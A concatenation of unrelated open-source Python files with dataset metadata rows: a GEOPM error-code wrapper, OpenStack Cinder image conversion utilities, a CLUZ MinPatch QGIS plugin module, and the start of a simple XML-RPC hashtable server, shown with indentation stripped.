aToken = aToken[:-1]
return (aToken, aPunct)
def count(string, look_for):
start = 0
matches = 0
while True:
start = string.find (look_for, start)
if start < 0:
break
start += 1
matches += 1
return matches
def choose(optionlist,msg="please select from above options [using commas for individual selections and a hyphen for ranges]:\n"):
seldict={}
selnum=0
print
print
if type(optionlist)==type([]):
for option in optionlist:
selnum+=1
seldict[selnum]=option
print "\t"+"\t".join(str(x) for x in [selnum,option])
elif type(optionlist)==type({}):
for option,desc in optionlist.items():
selnum+=1
seldict[selnum]=option
print "\t"+"\t".join(str(x) for x in [selnum,option,desc])
inp=raw_input("\n\t>> "+msg+"\n\t").strip()
sels=[]
for np in inp.split(","):
np=np.strip()
if "-" in np:
try:
nn=np.split("-")
for n in range(int(nn[0]),int(nn[1])+1):
sels.append(seldict[n])
except:
continue
else:
try:
sels.append(seldict[int(np)])
except:
continue
return sels
def hash(string):
import hashlib
return str(hashlib.sha224(string).hexdigest()) | mit | -8,339,637,571,409,473,000 | 19.737154 | 130 | 0.596454 | false |
geopm/geopm | scripts/geopmpy/error.py | 1 | 3896 | #!/usr/bin/env python3
#
# Copyright (c) 2015 - 2021, Intel Corporation
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY LOG OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# pylint: disable=deprecated-sys-function
from __future__ import absolute_import
import cffi
import sys
_ffi = cffi.FFI()
_ffi.cdef("""
enum geopm_error_e {
GEOPM_ERROR_RUNTIME = -1,
GEOPM_ERROR_LOGIC = -2,
GEOPM_ERROR_INVALID = -3,
GEOPM_ERROR_FILE_PARSE = -4,
GEOPM_ERROR_LEVEL_RANGE = -5,
GEOPM_ERROR_NOT_IMPLEMENTED = -6,
GEOPM_ERROR_PLATFORM_UNSUPPORTED = -7,
GEOPM_ERROR_MSR_OPEN = -8,
GEOPM_ERROR_MSR_READ = -9,
GEOPM_ERROR_MSR_WRITE = -10,
GEOPM_ERROR_AGENT_UNSUPPORTED = -11,
GEOPM_ERROR_AFFINITY = -12,
GEOPM_ERROR_NO_AGENT = -13,
};
void geopm_error_message(int err, char *msg, size_t size);
""")
try:
_dl = _ffi.dlopen('libgeopmpolicy.so', _ffi.RTLD_GLOBAL|_ffi.RTLD_LAZY)
except OSError as ee:
raise OSError('This module requires libgeopmpolicy.so to be present in your LD_LIBRARY_PATH.') from ee
ERROR_RUNTIME = _dl.GEOPM_ERROR_RUNTIME
ERROR_LOGIC = _dl.GEOPM_ERROR_LOGIC
ERROR_INVALID = _dl.GEOPM_ERROR_INVALID
ERROR_FILE_PARSE = _dl.GEOPM_ERROR_FILE_PARSE
ERROR_LEVEL_RANGE = _dl.GEOPM_ERROR_LEVEL_RANGE
ERROR_NOT_IMPLEMENTED = _dl.GEOPM_ERROR_NOT_IMPLEMENTED
ERROR_PLATFORM_UNSUPPORTED = _dl.GEOPM_ERROR_PLATFORM_UNSUPPORTED
ERROR_MSR_OPEN = _dl.GEOPM_ERROR_MSR_OPEN
ERROR_MSR_READ = _dl.GEOPM_ERROR_MSR_READ
ERROR_MSR_WRITE = _dl.GEOPM_ERROR_MSR_WRITE
ERROR_AGENT_UNSUPPORTED = _dl.GEOPM_ERROR_AGENT_UNSUPPORTED
ERROR_AFFINITY = _dl.GEOPM_ERROR_AFFINITY
ERROR_NO_AGENT = _dl.GEOPM_ERROR_NO_AGENT
def message(err_number):
"""Return the error message associated with the error code. Positive
error codes are interpreted as system error numbers, and
negative error codes are interpreted as GEOPM error numbers.
Args:
err_number (int): Error code to be interpreted.
Returns:
str: Error message associated with error code.
"""
global _ffi
global _dl
name_max = 1024
result_cstr = _ffi.new("char[]", name_max)
_dl.geopm_error_message(err_number, result_cstr, name_max)
return _ffi.string(result_cstr).decode()
def exc_clear():
"""Clear out exception record when run with python2, in python3 this
is cleared automatically when you leave the except clause.
"""
if 'exc_clear' in dir(sys):
sys.exc_clear()
| bsd-3-clause | 1,610,141,121,753,856,000 | 35.754717 | 106 | 0.717659 | false |
blueboxgroup/cinder | cinder/image/image_utils.py | 1 | 16990 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Helper methods to deal with images.
This is essentially a copy from nova.virt.images.py
Some slight modifications, but at some point
we should look at maybe pushing this up to Oslo
"""
import contextlib
import os
import tempfile
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_utils import timeutils
from oslo_utils import units
from cinder import exception
from cinder.i18n import _
from cinder.openstack.common import fileutils
from cinder.openstack.common import imageutils
from cinder.openstack.common import log as logging
from cinder import utils
from cinder.volume import utils as volume_utils
LOG = logging.getLogger(__name__)
image_helper_opt = [cfg.StrOpt('image_conversion_dir',
default='$state_path/conversion',
help='Directory used for temporary storage '
'during image conversion'), ]
CONF = cfg.CONF
CONF.register_opts(image_helper_opt)
def qemu_img_info(path, run_as_root=True):
"""Return a object containing the parsed output from qemu-img info."""
cmd = ('env', 'LC_ALL=C', 'qemu-img', 'info', path)
if os.name == 'nt':
cmd = cmd[2:]
out, _err = utils.execute(*cmd, run_as_root=run_as_root)
return imageutils.QemuImgInfo(out)
def convert_image(source, dest, out_format, bps_limit=None, run_as_root=True):
"""Convert image to other format."""
cmd = ('qemu-img', 'convert',
'-O', out_format, source, dest)
# Check whether O_DIRECT is supported and set '-t none' if it is
# This is needed to ensure that all data hit the device before
# it gets unmapped remotely from the host for some backends
# Reference Bug: #1363016
# NOTE(jdg): In the case of file devices qemu does the
# flush properly and more efficiently than would be done
# setting O_DIRECT, so check for that and skip the
# setting for non BLK devs
if (utils.is_blk_device(dest) and
volume_utils.check_for_odirect_support(source,
dest,
'oflag=direct')):
cmd = ('qemu-img', 'convert',
'-t', 'none',
'-O', out_format, source, dest)
start_time = timeutils.utcnow()
cgcmd = volume_utils.setup_blkio_cgroup(source, dest, bps_limit)
if cgcmd:
cmd = tuple(cgcmd) + cmd
utils.execute(*cmd, run_as_root=run_as_root)
duration = timeutils.delta_seconds(start_time, timeutils.utcnow())
# NOTE(jdg): use a default of 1, mostly for unit test, but in
# some incredible event this is 0 (cirros image?) don't barf
if duration < 1:
duration = 1
fsz_mb = os.stat(source).st_size / units.Mi
mbps = (fsz_mb / duration)
msg = ("Image conversion details: src %(src)s, size %(sz).2f MB, "
"duration %(duration).2f sec, destination %(dest)s")
LOG.debug(msg % {"src": source,
"sz": fsz_mb,
"duration": duration,
"dest": dest})
msg = _("Converted %(sz).2f MB image at %(mbps).2f MB/s")
LOG.info(msg % {"sz": fsz_mb, "mbps": mbps})
def resize_image(source, size, run_as_root=False):
"""Changes the virtual size of the image."""
cmd = ('qemu-img', 'resize', source, '%sG' % size)
utils.execute(*cmd, run_as_root=run_as_root)
def fetch(context, image_service, image_id, path, _user_id, _project_id):
# TODO(vish): Improve context handling and add owner and auth data
# when it is added to glance. Right now there is no
# auth checking in glance, so we assume that access was
# checked before we got here.
start_time = timeutils.utcnow()
with fileutils.remove_path_on_error(path):
with open(path, "wb") as image_file:
image_service.download(context, image_id, image_file)
duration = timeutils.delta_seconds(start_time, timeutils.utcnow())
# NOTE(jdg): use a default of 1, mostly for unit test, but in
# some incredible event this is 0 (cirros image?) don't barf
if duration < 1:
duration = 1
fsz_mb = os.stat(image_file.name).st_size / units.Mi
mbps = (fsz_mb / duration)
msg = ("Image fetch details: dest %(dest)s, size %(sz).2f MB, "
"duration %(duration).2f sec")
LOG.debug(msg % {"dest": image_file.name,
"sz": fsz_mb,
"duration": duration})
msg = _("Image download %(sz).2f MB at %(mbps).2f MB/s")
LOG.info(msg % {"sz": fsz_mb, "mbps": mbps})
def fetch_verify_image(context, image_service, image_id, dest,
user_id=None, project_id=None, size=None,
run_as_root=True):
fetch(context, image_service, image_id, dest,
None, None)
with fileutils.remove_path_on_error(dest):
data = qemu_img_info(dest, run_as_root=run_as_root)
fmt = data.file_format
if fmt is None:
raise exception.ImageUnacceptable(
reason=_("'qemu-img info' parsing failed."),
image_id=image_id)
backing_file = data.backing_file
if backing_file is not None:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=(_("fmt=%(fmt)s backed by: %(backing_file)s") %
{'fmt': fmt, 'backing_file': backing_file}))
# NOTE(xqueralt): If the image virtual size doesn't fit in the
# requested volume there is no point on resizing it because it will
# generate an unusable image.
if size is not None and data.virtual_size > size:
params = {'image_size': data.virtual_size, 'volume_size': size}
reason = _("Size is %(image_size)dGB and doesn't fit in a "
"volume of size %(volume_size)dGB.") % params
raise exception.ImageUnacceptable(image_id=image_id, reason=reason)
def fetch_to_vhd(context, image_service,
image_id, dest, blocksize,
user_id=None, project_id=None, run_as_root=True):
fetch_to_volume_format(context, image_service, image_id, dest, 'vpc',
blocksize, user_id, project_id,
run_as_root=run_as_root)
def fetch_to_raw(context, image_service,
image_id, dest, blocksize,
user_id=None, project_id=None, size=None, run_as_root=True):
fetch_to_volume_format(context, image_service, image_id, dest, 'raw',
blocksize, user_id, project_id, size,
run_as_root=run_as_root)
def fetch_to_volume_format(context, image_service,
image_id, dest, volume_format, blocksize,
user_id=None, project_id=None, size=None,
run_as_root=True):
qemu_img = True
image_meta = image_service.show(context, image_id)
# NOTE(avishay): I'm not crazy about creating temp files which may be
# large and cause disk full errors which would confuse users.
# Unfortunately it seems that you can't pipe to 'qemu-img convert' because
# it seeks. Maybe we can think of something for a future version.
with temporary_file() as tmp:
# We may be on a system that doesn't have qemu-img installed. That
# is ok if we are working with a RAW image. This logic checks to see
# if qemu-img is installed. If not we make sure the image is RAW and
# throw an exception if not. Otherwise we stop before needing
# qemu-img. Systems with qemu-img will always progress through the
# whole function.
try:
# Use the empty tmp file to make sure qemu_img_info works.
qemu_img_info(tmp, run_as_root=run_as_root)
except processutils.ProcessExecutionError:
qemu_img = False
if image_meta:
if image_meta['disk_format'] != 'raw':
raise exception.ImageUnacceptable(
reason=_("qemu-img is not installed and image is of "
"type %s. Only RAW images can be used if "
"qemu-img is not installed.") %
image_meta['disk_format'],
image_id=image_id)
else:
raise exception.ImageUnacceptable(
reason=_("qemu-img is not installed and the disk "
"format is not specified. Only RAW images "
"can be used if qemu-img is not installed."),
image_id=image_id)
fetch(context, image_service, image_id, tmp, user_id, project_id)
if is_xenserver_image(context, image_service, image_id):
replace_xenserver_image_with_coalesced_vhd(tmp)
if not qemu_img:
# qemu-img is not installed but we do have a RAW image. As a
# result we only need to copy the image to the destination and then
# return.
LOG.debug('Copying image from %(tmp)s to volume %(dest)s - '
'size: %(size)s' % {'tmp': tmp, 'dest': dest,
'size': image_meta['size']})
volume_utils.copy_volume(tmp, dest, image_meta['size'], blocksize)
return
data = qemu_img_info(tmp, run_as_root=run_as_root)
virt_size = data.virtual_size / units.Gi
# NOTE(xqueralt): If the image virtual size doesn't fit in the
# requested volume there is no point on resizing it because it will
# generate an unusable image.
if size is not None and virt_size > size:
params = {'image_size': virt_size, 'volume_size': size}
reason = _("Size is %(image_size)dGB and doesn't fit in a "
"volume of size %(volume_size)dGB.") % params
raise exception.ImageUnacceptable(image_id=image_id, reason=reason)
fmt = data.file_format
if fmt is None:
raise exception.ImageUnacceptable(
reason=_("'qemu-img info' parsing failed."),
image_id=image_id)
backing_file = data.backing_file
if backing_file is not None:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=_("fmt=%(fmt)s backed by:%(backing_file)s")
% {'fmt': fmt, 'backing_file': backing_file, })
# NOTE(jdg): I'm using qemu-img convert to write
# to the volume regardless if it *needs* conversion or not
# TODO(avishay): We can speed this up by checking if the image is raw
# and if so, writing directly to the device. However, we need to keep
# check via 'qemu-img info' that what we copied was in fact a raw
# image and not a different format with a backing file, which may be
# malicious.
LOG.debug("%s was %s, converting to %s " % (image_id, fmt,
volume_format))
convert_image(tmp, dest, volume_format,
bps_limit=CONF.volume_copy_bps_limit,
run_as_root=run_as_root)
data = qemu_img_info(dest, run_as_root=run_as_root)
if data.file_format != volume_format:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=_("Converted to %(vol_format)s, but format is "
"now %(file_format)s") % {'vol_format': volume_format,
'file_format': data.
file_format})
def upload_volume(context, image_service, image_meta, volume_path,
volume_format='raw', run_as_root=True):
image_id = image_meta['id']
if (image_meta['disk_format'] == volume_format):
LOG.debug("%s was %s, no need to convert to %s" %
(image_id, volume_format, image_meta['disk_format']))
if os.name == 'nt' or os.access(volume_path, os.R_OK):
with fileutils.file_open(volume_path, 'rb') as image_file:
image_service.update(context, image_id, {}, image_file)
else:
with utils.temporary_chown(volume_path):
with fileutils.file_open(volume_path) as image_file:
image_service.update(context, image_id, {}, image_file)
return
with temporary_file() as tmp:
LOG.debug("%s was %s, converting to %s" %
(image_id, volume_format, image_meta['disk_format']))
convert_image(volume_path, tmp, image_meta['disk_format'],
bps_limit=CONF.volume_copy_bps_limit,
run_as_root=run_as_root)
data = qemu_img_info(tmp, run_as_root=run_as_root)
if data.file_format != image_meta['disk_format']:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=_("Converted to %(f1)s, but format is now %(f2)s") %
{'f1': image_meta['disk_format'], 'f2': data.file_format})
with fileutils.file_open(tmp, 'rb') as image_file:
image_service.update(context, image_id, {}, image_file)
def is_xenserver_image(context, image_service, image_id):
image_meta = image_service.show(context, image_id)
return is_xenserver_format(image_meta)
def is_xenserver_format(image_meta):
return (
image_meta['disk_format'] == 'vhd'
and image_meta['container_format'] == 'ovf'
)
def set_vhd_parent(vhd_path, parentpath):
utils.execute('vhd-util', 'modify', '-n', vhd_path, '-p', parentpath)
def extract_targz(archive_name, target):
utils.execute('tar', '-xzf', archive_name, '-C', target)
def fix_vhd_chain(vhd_chain):
for child, parent in zip(vhd_chain[:-1], vhd_chain[1:]):
set_vhd_parent(child, parent)
def get_vhd_size(vhd_path):
out, _err = utils.execute('vhd-util', 'query', '-n', vhd_path, '-v')
return int(out)
def resize_vhd(vhd_path, size, journal):
utils.execute(
'vhd-util', 'resize', '-n', vhd_path, '-s', '%d' % size, '-j', journal)
def coalesce_vhd(vhd_path):
utils.execute(
'vhd-util', 'coalesce', '-n', vhd_path)
def create_temporary_file(*args, **kwargs):
if (CONF.image_conversion_dir and not
os.path.exists(CONF.image_conversion_dir)):
os.makedirs(CONF.image_conversion_dir)
fd, tmp = tempfile.mkstemp(dir=CONF.image_conversion_dir, *args, **kwargs)
os.close(fd)
return tmp
@contextlib.contextmanager
def temporary_file(*args, **kwargs):
tmp = None
try:
tmp = create_temporary_file(*args, **kwargs)
yield tmp
finally:
if tmp:
fileutils.delete_if_exists(tmp)
def temporary_dir():
if (CONF.image_conversion_dir and not
os.path.exists(CONF.image_conversion_dir)):
os.makedirs(CONF.image_conversion_dir)
return utils.tempdir(dir=CONF.image_conversion_dir)
def coalesce_chain(vhd_chain):
for child, parent in zip(vhd_chain[:-1], vhd_chain[1:]):
with temporary_dir() as directory_for_journal:
size = get_vhd_size(child)
journal_file = os.path.join(
directory_for_journal, 'vhd-util-resize-journal')
resize_vhd(parent, size, journal_file)
coalesce_vhd(child)
return vhd_chain[-1]
def discover_vhd_chain(directory):
counter = 0
chain = []
while True:
fpath = os.path.join(directory, '%d.vhd' % counter)
if os.path.exists(fpath):
chain.append(fpath)
else:
break
counter += 1
return chain
def replace_xenserver_image_with_coalesced_vhd(image_file):
with temporary_dir() as tempdir:
extract_targz(image_file, tempdir)
chain = discover_vhd_chain(tempdir)
fix_vhd_chain(chain)
coalesced = coalesce_chain(chain)
fileutils.delete_if_exists(image_file)
os.rename(coalesced, image_file)
| apache-2.0 | 4,822,887,739,440,777,000 | 38.696262 | 79 | 0.588994 | false |
AnotherBobSmith/CLUZ | cluz_mpmain.py | 1 | 12019 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
A QGIS plugin
CLUZ for QGIS
-------------------
begin : 2016-23-02
copyright : (C) 2016 by Bob Smith, DICE
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import qgis
from qgis.gui import *
import os
import copy
import cluz_mpfunctions
import cluz_mpoutputs
import cluz_mpsetup
import cluz_functions2
import cluz_display
def runMinPatch(setupObject, minpatchObject, minpatchDataDict):
marxanNameString = minpatchObject.marxanFileName + "_r"
finalNameString = "mp_" + marxanNameString
marxanSolFileList = cluz_mpsetup.makeMarxanFileList(setupObject, marxanNameString)
preMarxanUnitDict = minpatchDataDict["initialUnitDictionary"]
summedSolDict = cluz_mpoutputs.produceSummedDict(preMarxanUnitDict)
patchResultsDict = {}
zoneStatsDict = {}
zoneFeaturePropStatsDict = {}
bestPortfolioCost = -1
continueBool = True
for marxanSolFilePath in marxanSolFileList:
runningUnitDict = createRunningUnitDictionary(minpatchDataDict, marxanSolFilePath)
patchDict = cluz_mpfunctions.makePatchDict(runningUnitDict, minpatchDataDict)
qgis.utils.iface.mainWindow().statusBar().showMessage("Processing file " + marxanSolFilePath + ".")
if minpatchDataDict["patch_stats"] and continueBool:
beforePatchStatsDict = cluz_mpoutputs.makePatchStatsDict(patchDict, minpatchDataDict)
if minpatchDataDict["rem_small_patch"] and continueBool:
runningUnitDict = cluz_mpfunctions.remSmallPatchesFromUnitDict(minpatchDataDict,runningUnitDict, patchDict)
qgis.utils.iface.mainWindow().statusBar().showMessage("Processing file " + marxanSolFilePath + ". Removing patches that are smaller than the specified thresholds...")
if minpatchDataDict["add_patches"] and continueBool:
runningUnitDict, continueBool = cluz_mpfunctions.addPatches(minpatchDataDict, runningUnitDict)
qgis.utils.iface.mainWindow().statusBar().showMessage("Processing file " + marxanSolFilePath + ". Adding new patches...")
if minpatchDataDict["whittle_polish"] and continueBool:
runningUnitDict = cluz_mpfunctions.runSimWhittle(runningUnitDict, minpatchDataDict)
qgis.utils.iface.mainWindow().statusBar().showMessage("Processing file " + marxanSolFilePath + ". Simulated whittling...")
runningUnitDict = addConservedPUs(runningUnitDict,minpatchDataDict)
if minpatchDataDict["patch_stats"] and continueBool:
patchDict = cluz_mpfunctions.makePatchDict(runningUnitDict, minpatchDataDict)
afterPatchStatsDict = cluz_mpoutputs.makePatchStatsDict(patchDict, minpatchDataDict)
if continueBool:
outputFilePath = marxanSolFilePath.replace(marxanNameString, finalNameString)
cluz_mpoutputs.printRunResults(minpatchDataDict, runningUnitDict, outputFilePath)
costDict = makeCostDict(minpatchDataDict, runningUnitDict)
totalCost = costDict['totalBoundaryCost'] + costDict['totalUnitCost']
if minpatchDataDict["patch_stats"]:
patchResultsDict = cluz_mpoutputs.producePatchResultsDict(patchResultsDict, marxanSolFilePath, beforePatchStatsDict, afterPatchStatsDict, costDict)
if minpatchDataDict["zone_stats"]:
zoneNameString = os.path.basename(marxanSolFilePath)
zoneStatsDict[zoneNameString] = cluz_mpoutputs.makeRunZoneStatsDict(minpatchDataDict, runningUnitDict, zoneStatsDict)
zoneFeaturePropStatsDict[zoneNameString] = cluz_mpoutputs.makeRunZoneFeaturePropStatsDict(minpatchDataDict, runningUnitDict)
if bestPortfolioCost == -1:
bestPortfolioCost = totalCost
bestPortfolio = copy.deepcopy(runningUnitDict)
        if bestPortfolioCost != -1 and totalCost < bestPortfolioCost:
bestPortfolioCost = totalCost
bestPortfolio = copy.deepcopy(runningUnitDict)
summedDict = cluz_mpoutputs.updateSummedDict(summedSolDict,runningUnitDict)
if continueBool:
bestFileName = setupObject.outputPath + os.sep + 'mp_' + minpatchObject.marxanFileName + '_best.txt'
cluz_mpoutputs.printRunResults(minpatchDataDict, bestPortfolio, bestFileName)
summedFileName = setupObject.outputPath + os.sep + 'mp_' + minpatchObject.marxanFileName + '_summed.txt'
cluz_mpoutputs.printSummedResults(summedDict, summedFileName)
if minpatchDataDict["patch_stats"]:
patchstatsFileName = setupObject.outputPath + os.sep + 'mp_' + minpatchObject.marxanFileName + '_patchstats.csv'
cluz_mpoutputs.printPatchStats(patchResultsDict, patchstatsFileName)
if minpatchDataDict["zone_stats"]:
zoneStatsBaseFileName = setupObject.outputPath + os.sep + 'mp_' + minpatchObject.marxanFileName
cluz_mpoutputs.printZoneStats(minpatchDataDict, zoneStatsDict, zoneStatsBaseFileName)
cluz_mpoutputs.printZoneFeaturePropStats(minpatchDataDict, zoneFeaturePropStatsDict, zoneStatsBaseFileName)
cluz_functions2.addBestMarxanOutputToPUShapefile(setupObject, bestFileName, "MP_Best")
cluz_functions2.addSummedMarxanOutputToPUShapefile(setupObject, summedFileName, "MP_SF_Scr")
cluz_display.reloadPULayer(setupObject)
cluz_display.removePreviousMinPatchLayers()
bestLayerName = "MP Best (" + minpatchObject.marxanFileName + ")"
summedLayerName = "MP SF_Score (" + minpatchObject.marxanFileName + ")"
cluz_display.displayBestOutput(setupObject, "MP_Best", bestLayerName)
cluz_display.displayGraduatedLayer(setupObject, "MP_SF_Scr", summedLayerName, 1) #1 is SF legend code
qgis.utils.iface.mainWindow().statusBar().showMessage("")
qgis.utils.iface.messageBar().pushMessage("MinPatch results", "MinPatch has completed the analysis and the results files are in the specified output folder.", QgsMessageBar.INFO, 3)
def createRunningUnitDictionary(minpatchDataDict, marxanSolLocationString):
preMarxanUnitDict = minpatchDataDict["initialUnitDictionary"]
initUnitDict = copy.deepcopy(preMarxanUnitDict)
marxanSolDictOKBool, aMarxanSolDict = cluz_mpsetup.makeMarxanSolDict(marxanSolLocationString) #marxanSolDictOKBool not used here
runningUnitDict = makeStartUnitDict(initUnitDict, aMarxanSolDict)
return runningUnitDict
def makeStartUnitDict(unitDictionary, marxanSolDictionary):
for aRow in marxanSolDictionary:
solPUStatus = marxanSolDictionary[aRow]
if solPUStatus == 1:
puList = unitDictionary[aRow]
puList[1] = 1
unitDictionary[aRow] = puList
return unitDictionary
def addConservedPUs(runningUnitDict, minpatchDataDict):
initUnitDict = minpatchDataDict["initialUnitDictionary"]
for puUnitValue in runningUnitDict:
if initUnitDict[puUnitValue][1] == 2:
puList = runningUnitDict[puUnitValue]
puList[1] = 2
runningUnitDict[puUnitValue] = puList
return runningUnitDict
def makeCostDict(minpatchDataDict, puDict):
costDict = {}
abundanceMatrixDict = minpatchDataDict["abundanceMatrixDictionary"]
targetDict = minpatchDataDict["targetDictionary"]
boundaryMatrixDict = minpatchDataDict["boundaryMatrixDictionary"]
targetList = targetDict.keys()
targetList.sort()
abundValuesDict, numActivePUs = makeAbundValuesDict_numActivePUs(targetList, abundanceMatrixDict, puDict)
costDict["abundanceValuesDictionary"] = abundValuesDict
costDict["numberActivePUs"] = numActivePUs
totalUnitCost, conUnitCount = calcUnitCosts(puDict)
costDict["totalUnitCost"] = totalUnitCost
costDict["conservedUnitCount"] = conUnitCount
amountConservedDict = makeAmountConservedDictionary(targetList, abundanceMatrixDict, puDict)
costDict["amountConservedDictionary"] = amountConservedDict
costDict["totalTargetCost"] = makeTotalTargetCost(amountConservedDict, targetDict)
totalBoundLength, totalBoundaryCost = makeBoundCosts(minpatchDataDict, boundaryMatrixDict, puDict)
costDict["totalBoundaryLength"] = totalBoundLength
costDict["totalBoundaryCost"] = totalBoundaryCost
return costDict
def makeAbundValuesDict_numActivePUs(targetList, abundanceMatrixDict, puDict):
numActivePUs = 0
abundValuesDict = {}
for aRow in targetList:
abundValuesDict[aRow] = [0, 0, 0, 0]
for aUnit in abundanceMatrixDict:
puList = puDict[aUnit]
puStatus = puList[1]
#Count the number of units that could be selected in the iteration section
if puStatus == 0 or puStatus ==1:
numActivePUs += 1
puAbundDict = abundanceMatrixDict[aUnit]
for aFeature in puAbundDict:
theAmount = puAbundDict[aFeature]
featureList = abundValuesDict[aFeature]
runningValue = featureList[puStatus]
runningValue += theAmount
featureList[puStatus] = runningValue
abundValuesDict[aFeature] = featureList
return abundValuesDict, numActivePUs
def calcUnitCosts(puDict):
totalUnitCost = 0
conUnitCount = 0
for unitID in puDict:
theList = puDict[unitID]
unitValue, unitStatus = theList
if unitStatus == 1 or unitStatus == 2:
totalUnitCost += unitValue
conUnitCount += 1
return totalUnitCost, conUnitCount
def makeAmountConservedDictionary(targetList, abundanceMatrixDictionary, unitDictionary):
amountConservedDict = {}
for bNum in targetList:
amountConservedDict[bNum] = 0
for puID in abundanceMatrixDictionary:
puStatus = unitDictionary[puID][1]
if puStatus == 1 or puStatus == 2:
puAbundDict = abundanceMatrixDictionary[puID]
for featID in puAbundDict:
featAmount = puAbundDict[featID]
conTotalValue = amountConservedDict[featID]
conTotalValue += featAmount
amountConservedDict[featID] = conTotalValue
return amountConservedDict
def makeTotalTargetCost(amountConservedDictionary, targetDictionary):
totalTargetCost = 0
for featureID in amountConservedDictionary.keys():
amountConserved = amountConservedDictionary[featureID]
targetValuesList = targetDictionary[featureID]
theTarget = targetValuesList[1]
thePenalty = targetValuesList[2]
if amountConserved < theTarget:
totalTargetCost = totalTargetCost + thePenalty
return totalTargetCost
def makeBoundCosts(minpatchDataDict, boundaryMatrixDict, puDict):
totalBoundLength = cluz_functions2.calcTotalBoundLength(boundaryMatrixDict, puDict)
BLMvalue = minpatchDataDict["bound_cost"]
totalBoundaryCost = totalBoundLength * BLMvalue
return totalBoundLength, totalBoundaryCost
| gpl-2.0 | 6,864,057,697,020,695,000 | 45.133333 | 189 | 0.672685 | false |
juncgu/FUSE | server0/simpleht.py | 1 | 11113 | #!/usr/bin/env python
"""
Author: David Wolinsky
Version: 0.02
Description:
The XmlRpc API for this library is:
get(base64 key)
Returns the value and ttl associated with the given key using a dictionary
or an empty dictionary if there is no matching key
Example usage:
rv = rpc.get(Binary("key"))
print rv => {"value": Binary, "ttl": 1000}
print rv["value"].data => "value"
put(base64 key, base64 value, int ttl)
Inserts the key / value pair into the hashtable, using the same key will
over-write existing values
Example usage: rpc.put(Binary("key"), Binary("value"), 1000)
print_content()
Print the contents of the HT
  read_file(string filename)
    Load the contents of the file into the Hashtable
  write_file(string filename)
    Store the contents of the Hashtable into a file
"""
import sys, SimpleXMLRPCServer, getopt, pickle, time, threading, xmlrpclib, unittest
import random, copy
from datetime import datetime, timedelta
from xmlrpclib import Binary
from threading import Lock, RLock
# Presents a HT interface
class SimpleHT:
def __init__(self):
self.data = {}
self.next_check = datetime.now() + timedelta(minutes = 5)
random.seed()
self.dump = 1
def count(self):
# Remove expired entries
self.next_check = datetime.now() - timedelta(minutes = 5)
self.check()
return len(self.data)
# Retrieve something from the HT
def get(self, key):
"""Juncheng Gu:
The simulation of StandardError
prob = random.random()
if prob < 0.005:
raise StandardError
"""
# Remove expired entries
self.check()
# Default return value
rv = {}
# If the key is in the data structure, return properly formated results
key = key.data
if key in self.data:
ent = self.data[key]
now = datetime.now()
if ent[1] > now:
ttl = (ent[1] - now).seconds
rv = {"value": Binary(ent[0]), "ttl": ttl}
else:
del self.data[key]
return rv
# Insert something into the HT
def put(self, key, value, ttl):
# Remove expired entries
self.check()
end = datetime.now() + timedelta(seconds = ttl)
self.data[key.data] = (value.data, end)
return True
"""
acquire read lock
"""
def acquire_r_lock(self, key, u_id):
file = copy.deepcopy(pickle.loads(self.data[key.data][0]))
r = file['w_lock']
user = pickle.loads(u_id.data)
print user, " enter acquire_R_lock"
print " ", key, "pre r_lock", file['r_lock']
print " ", key, "pre w_lock", r
if file['w_lock'] == 0:
file['r_lock'] = file['r_lock'] + 1
self.check()
end = datetime.now() + timedelta(seconds = 10000)
self.data[key.data] = (pickle.dumps(file), end)
print " ", key, "aft r_lock", file['r_lock']
print " ", key, "aft w_lock", file['w_lock']
print user, " leave acquire_R_lock"
return Binary(pickle.dumps(r))
"""
acquire write lock
"""
def acquire_w_lock(self, key, u_id):
file = copy.deepcopy(pickle.loads(self.data[key.data][0]))
w = (copy.deepcopy(file['r_lock']), copy.deepcopy(file['w_lock']))
user = pickle.loads(u_id.data)
print user, "enter acquire_W_lock"
print " ", key, "pre r_lock", file['r_lock']
print " ", key, "pre w_lock", file['w_lock']
sum = w[0] + w[1]
if sum == 0:
file['w_lock'] = 1
self.check()
